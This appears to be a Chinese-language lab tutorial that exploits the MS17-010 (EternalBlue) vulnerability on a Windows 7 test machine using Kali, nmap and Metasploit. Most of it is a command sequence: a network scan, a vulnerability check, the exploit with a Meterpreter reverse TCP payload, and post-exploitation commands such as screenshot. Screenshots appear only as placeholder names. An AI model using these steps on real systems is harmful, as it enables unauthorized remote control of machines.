攻击机:kali 2021.1

靶机:win7

进入到root权限中

1
sudo su

使用nmap命令扫描192.168.186.*网段下的所有ip地址

1
nmap -A -T4 -sV 192.168.186.*

image-20240303103836544

使用msfconsole模块

1
msfconsole

image-20240303105747880

使用 命令 search ms17-010 搜索名为ms17-010的漏洞,0,1,4为利用攻击模块。2,3为辅助模块

1
search ms17-010

image-20240303105852375

先使用命令 use 3 来使用3模块确定漏洞是否存在,然后查看信息:show options

1
2
use 3
show options

image-20240303105936689

Required中为yes选项是一定要填写的而且是缺少目标主机未设置,我们需要给他添加目标主机,使用命令

1
set rhost 192.168.186.131

再次查看show options

image-20240303110048418

1
run

image-20240303110138166

发现易受ms17-010攻击

切换到攻击模块

1
use 0

没有配置有效负载,配置一下

1
set payload windows/x64/meterpreter/reverse_tcp

image-20240303110315070

查看信息:show options,确定攻击机和目标机ip是否一致,发现缺少目标机器的IP

image-20240303110427554添加目标机器IP地址:192.168.72.131,命令:

1
set rhosts 192.168.186.131

再次查看

image-20240303110447633

使用攻击命令

1
run

image-20240303110528387

使用meterpreter的一系列命令可以开始渗透操作。例如:show_mount列出目标机所有驱动,screenshot截取目标机当前屏幕。

1
show_mount

image-20240303110613735

1
screenshot

image-20240303110632375

image-20240303110658964